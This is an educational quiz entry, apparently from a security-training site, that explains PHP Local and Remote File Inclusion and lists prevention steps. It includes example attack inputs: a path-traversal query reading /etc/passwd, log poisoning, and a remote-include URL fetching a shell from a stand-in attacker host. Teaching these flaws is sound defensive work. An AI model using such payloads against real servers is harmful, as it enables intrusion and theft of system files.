LOGBOOK

HELP

Quiz Entry - updated: 2026.07.05

What is Local/Remote File Inclusion and how does it enable code execution?

When user input picks which file the server includes/executes: LFI pulls in a file already on the server (e.g. a poisoned log), RFI pulls one from the attacker's server — both can reach code execution.

Local vs Remote File Inclusion: user input controls include(); LFI reads a local file or a poisoned log, RFI fetches the attacker's remote file, both reaching code execution.

* LFI includes a file already on the server (traversal to /etc/passwd, or a poisoned log that then runs); RFI makes the server fetch and run the attacker's remote file — instant code execution. *

File Inclusion vulnerabilities occur when user input controls which file is loaded by server-side code.

Local File Inclusion (LFI):

  • Attacker references files already on the server
  • ?page=../../../etc/passwd → reads system password file
  • ?page=../logs/access.log → if log contains injected PHP, it executes

Remote File Inclusion (RFI):

  • Attacker includes file from external server
  • ?page=http://evil.com/shell → server fetches and executes attacker's code
  • Instant remote code execution

Root cause: Code like include($_GET['page'] . '.php') trusts user input.

Prevention:

  1. Whitelist allowed files - never use raw user input for includes
  2. Disable allow_url_include in PHP config
  3. Use basename() to strip path traversal (../)
  4. Better: Use routing - don't dynamically include based on user input

Go deeper:

From Quiz: SPRG / Buffer Overflow | Updated: Jul 05, 2026